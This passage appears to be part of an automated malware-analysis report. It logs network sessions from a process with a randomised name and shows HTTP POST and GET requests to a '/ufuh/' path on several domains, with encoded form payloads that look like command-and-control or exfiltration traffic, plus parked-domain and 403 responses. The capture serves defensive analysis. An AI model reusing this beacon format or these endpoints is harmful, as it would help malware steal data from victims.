73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        May 14, 2024 09:37:49.033914089 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        May 14, 2024 09:37:49.034050941 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        May 14, 2024 09:37:49.034066916 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        May 14, 2024 09:37:49.034080029 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        May 14, 2024 09:37:49.034095049 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.2249172194.9.94.86802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:51.569571018 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 3623
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.xn--matfrmn-jxa4m.se
                                                                                        Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                        Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 37 43 38 31 63 6d 2b 32 69 6a 71 79 6d 78 4b 78 76 49 64 51 63 66 73 6e 68 48 54 49 4f 45 6a 77 69 32 55 37 49 58 4f 59 61 7a 42 6b 47 37 74 73 5a 62 48 62 58 4b 74 63 76 74 2b 59 67 4e 71 64 43 73 4e 79 7a 48 62 5a 69 5a 68 64 62 38 62 76 6a 64 64 63 44 56 41 43 68 71 4e 55 6d 62 33 59 4c 43 6b 69 6d 59 6a 39 43 76 6f 48 41 46 37 53 67 75 4d 45 62 44 55 68 59 66 6d 4f 79 56 6f 45 66 34 73 61 58 68 6a 64 43 6b 38 77 6d 56 78 52 4e 79 30 56 63 79 68 6d 7a 5a 30 66 4a 6b 59 6a 54 6b 4a 70 49 6b 33 5a 6b 58 2f 36 4b 6d 42 2f 53 58 6b 72 39 7a 68 39 2f 6e 71 73 42 76 5a 78 4f 2f 41 35 58 6e 55 69 75 31 45 61 4c 63 69 75 59 4f 50 43 55 43 73 54 71 4a 70 6e 51 44 68 57 71 73 63 41 38 63 2f 31 68 75 59 5a 63 73 6d 77 67 73 4f 6e 5a 2f 2b 63 5a 52 51 47 65 45 69 37 71 6b 79 48 30 4a 36 2b 75 44 70 51 45 57 77 72 73 77 67 4a 64 4c 53 6a 4e 4f 34 32 57 43 78 62 2f 44 6f 59 6a 4c 48 49 36 38 66 6e 56 77 31 61 72 71 7a 67 61 37 38 4d 57 4b 57 67 71 4b 68 42 2f 6d 63 [TRUNCATED]
                                                                                        Data Ascii: f6=EANcFG92XFNa7C81cm+2ijqymxKxvIdQcfsnhHTIOEjwi2U7IXOYazBkG7tsZbHbXKtcvt+YgNqdCsNyzHbZiZhdb8bvjddcDVAChqNUmb3YLCkimYj9CvoHAF7SguMEbDUhYfmOyVoEf4saXhjdCk8wmVxRNy0VcyhmzZ0fJkYjTkJpIk3ZkX/6KmB/SXkr9zh9/nqsBvZxO/A5XnUiu1EaLciuYOPCUCsTqJpnQDhWqscA8c/1huYZcsmwgsOnZ/+cZRQGeEi7qkyH0J6+uDpQEWwrswgJdLSjNO42WCxb/DoYjLHI68fnVw1arqzga78MWKWgqKhB/mcH3CMkgrmmdcj9XxEJho0iJ9AqstlAk++1kmInN6+rZBTZvj7OSi+PS9bxyp+gvTXKIpGkvm6udyL9dx5m6ssvUCC/hvIcUvfwuJ2P1liTSHyHPhc9pgZ1yDSOfErmQnYRpB7mBMipvQWdBhMmgN8Q5jXuDJpvva59AIabfMkhLGfDHAddKOaRn2Wbj7iuYNiMUJLrRqhXmApbPnjYZLbcYrzJzO5d070ZcggLaK+NgkdtDzENMiUnh+nhGGXuL24bkm2Ri1ZF7gj30bYl0xjJpEfdeW92Mz+fAB4DIcVpxWRsOz1qWVH7PF0YLXTapSunqsCNXy9apagjRmRa2nvCpjb9733D+4X7rbB9MlCDH64vQIAl+PBIumBXT4eg+yZXHaSsYirG3iS5LtcsIbSMGoYXOLoRCUwOpNsKMOGCxi7P4sJhO90c+bpBOeFmLBwi5/sru2AtiGO8LLlpjhhmBgvaCUgRX5chetm3phNVbaj8w9pMPcDklfqyt0vLsFKGubuh8cASq3JVoSOQ7G5CRRHnB5n4NBZ1aJCSkuOwDTlLElclj+wTIkLIzdSBZqqP7TpYmpLRYN8/HzgLCH+ilm9NybLKUQEcysmPBLgzHde1D44u6gvplR+rn9dK1L+T7ayBONZ74umC/dQpi3A5pG0ddih0TQpiI [TRUNCATED]
                                                                                        May 14, 2024 09:37:51.879180908 CEST1591OUTData Raw: 33 4d 36 54 59 4d 59 73 61 68 78 62 64 6b 65 58 71 72 4a 58 64 50 43 62 2b 79 41 75 54 58 77 70 48 54 47 2b 6d 57 4c 72 73 31 57 4e 69 73 2f 75 50 6e 2b 70 65 66 36 55 72 7a 78 73 4c 2f 50 2f 64 53 50 48 6f 57 52 57 49 42 39 4f 64 61 6f 4e 42 4a
                                                                                        Data Ascii: 3M6TYMYsahxbdkeXqrJXdPCb+yAuTXwpHTG+mWLrs1WNis/uPn+pef6UrzxsL/P/dSPHoWRWIB9OdaoNBJDDZwcdli5QKYrFm9VpSN7Y725/k4uSralC3XEzetlRfitUqPjdDXb//ttg9E4DcbquSCpsRGrwG2vIaB5frPVK+styaW5ZNHEijJ1KZ4oHMgWfZ2ecQEZQ8ufrDx2ab/t7vcLeI/U9SHJvaPEPwRWgUukv/ER6qNo
                                                                                        May 14, 2024 09:37:52.188970089 CEST1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 14 May 2024 07:37:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.24
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        May 14, 2024 09:37:52.188987017 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        May 14, 2024 09:37:52.188998938 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        May 14, 2024 09:37:52.189013004 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        May 14, 2024 09:37:52.189023972 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        May 14, 2024 09:37:52.189039946 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.2249173194.9.94.86802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:54.389324903 CEST468OUTGET /ufuh/?f6=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&kjBDU=ZblXcjBhG HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Connection: close
                                                                                        Host: www.xn--matfrmn-jxa4m.se
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        May 14, 2024 09:37:54.694504976 CEST1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 14 May 2024 07:37:54 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.24
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        May 14, 2024 09:37:54.694516897 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        May 14, 2024 09:37:54.694530010 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        May 14, 2024 09:37:54.694540977 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        May 14, 2024 09:37:54.694547892 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        May 14, 2024 09:37:54.694555998 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.224917491.195.240.19802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:38:00.158834934 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 2159
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.primeplay88.org
                                                                                        Origin: http://www.primeplay88.org
                                                                                        Referer: http://www.primeplay88.org/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 32 6a 70 48 61 45 46 55 52 6f 69 39 38 37 5a 78 7a 6b 4b 6d 54 4b 46 59 53 55 45 50 75 39 67 4f 62 53 4d 73 31 33 4f 49 6d 71 64 48 50 70 76 30 6c 5a 70 41 43 69 43 58 51 41 67 47 63 50 57 47 61 43 32 4e 50 6b 77 71 31 31 54 44 33 62 31 31 52 45 58 30 2b 35 78 4f 76 54 47 54 55 72 76 51 45 4e 4c 43 64 48 47 2f 32 59 48 36 72 35 6a 4d 4b 76 45 69 4e 54 42 30 56 68 7a 44 33 66 49 6e 78 54 39 6b 35 71 2b 41 51 45 46 65 51 79 4a 61 36 66 6c 49 53 69 30 63 55 41 61 54 4f 61 70 31 4c 52 6c 72 53 45 79 35 41 52 41 37 2f 56 77 76 46 43 77 65 70 54 34 75 6b 56 45 52 44 65 56 33 44 2f 37 48 62 4e 57 50 57 44 41 4e 6f 75 52 31 74 71 51 43 75 31 77 61 6b 43 37 48 79 6d 53 38 2b 71 77 30 77 32 76 2b 72 31 48 71 52 47 79 4b 7a 59 35 73 65 79 42 78 38 66 48 4f 43 61 2f 4a 76 72 68 6f 59 4c 78 41 64 64 6a 6c 6a 73 42 38 57 4d 4f 77 73 69 38 77 43 39 51 7a 32 77 51 41 56 70 63 32 2f 48 2b 41 78 6b 64 78 4b 7a 6e 74 4c 52 35 42 6a 6d 69 48 32 39 75 79 53 63 41 36 74 41 [TRUNCATED]
                                                                                        Data Ascii: f6=jDXqObkiEjBYQ2jpHaEFURoi987ZxzkKmTKFYSUEPu9gObSMs13OImqdHPpv0lZpACiCXQAgGcPWGaC2NPkwq11TD3b11REX0+5xOvTGTUrvQENLCdHG/2YH6r5jMKvEiNTB0VhzD3fInxT9k5q+AQEFeQyJa6flISi0cUAaTOap1LRlrSEy5ARA7/VwvFCwepT4ukVERDeV3D/7HbNWPWDANouR1tqQCu1wakC7HymS8+qw0w2v+r1HqRGyKzY5seyBx8fHOCa/JvrhoYLxAddjljsB8WMOwsi8wC9Qz2wQAVpc2/H+AxkdxKzntLR5BjmiH29uyScA6tAoZ7F0PJ/nShC3U+4nlo2bdNGuBMZd0tZx0mOvZo8SJbfhBV8etSfKU/IdDh3fMCtwXW0a0HuEh8vB6blJo+GfWYbOvcLa2mhlHMKYi8OPnFam+DuGZEMM335WKXk4tAxf6iKeymUjRcIM0EKQYb/OZI1H1pHgbsehVlMLqDmUFCXnvR4bY9/CyisiBdc7SVgrDDIoZNbDfbEVmRysXEUORcsirHhJUjAp9NPHQES9TkX59rTLhycpBog1ptzRJQIBoO2wanDT1EPQ1SSOGPocnUIvaqZe5SB/mvZWfqpyY4GaAGQP9XJ+lSqJz3LBYm3LOd0pgDZrKUt9gKamC5zgVvZ3/TLKrnIMOFY5SUVkGXbo3qhg4DHkQjybTZzDUSh+3jmum2AiVmULcab/3SKRDkW2iVjPc1TBL3VUL0U2UhGYJbnNXkX8fqq0yx8cmEYdbhmv/FnTqs0cWqiVzIegvUrj95LweIDfMvq9ylqyIcv3rZBZBTP6oQfAO35zF/E1nVLOY8lEuhxk8rpZ8h79SF35oEHmI7uF/C790E7sej617kKTDqaJVzjAZ2b4k/uPlE+dwotYtpk//rSE7LK8Wbh2YBjh8mcEoZmF4RA9ro3VvA4KHF3cJFshVxGjRrTj2Y2Nh91N3ncFJ77am4Kqe6aqXtcJ4gvhM [TRUNCATED]
                                                                                        May 14, 2024 09:38:00.456949949 CEST208INHTTP/1.1 403 Forbidden
                                                                                        content-length: 93
                                                                                        cache-control: no-cache
                                                                                        content-type: text/html
                                                                                        connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                        May 14, 2024 09:38:00.456974030 CEST112OUTData Raw: 73 43 5a 71 77 45 65 4c 37 63 65 6c 50 42 58 6d 64 6a 58 5a 54 6e 6a 75 70 38 34 73 7a 64 59 49 35 67 51 76 6e 37 6d 39 52 62 57 6a 53 4d 62 74 41 69 37 41 66 76 4c 5a 30 72 67 31 50 68 41 57 45 42 4a 77 4c 6e 74 41 66 64 54 39 65 43 66 64 33 35
                                                                                        Data Ascii: sCZqwEeL7celPBXmdjXZTnjup84szdYI5gQvn7m9RbWjSMbtAi7AfvLZ0rg1PhAWEBJwLntAfdT9eCfd35dDElASkZdFpUkVGl9Hi+8xj5w13606


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.224917591.195.240.19802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:38:02.996174097 CEST729OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 199
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.primeplay88.org
                                                                                        Origin: http://www.primeplay88.org
                                                                                        Referer: http://www.primeplay88.org/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
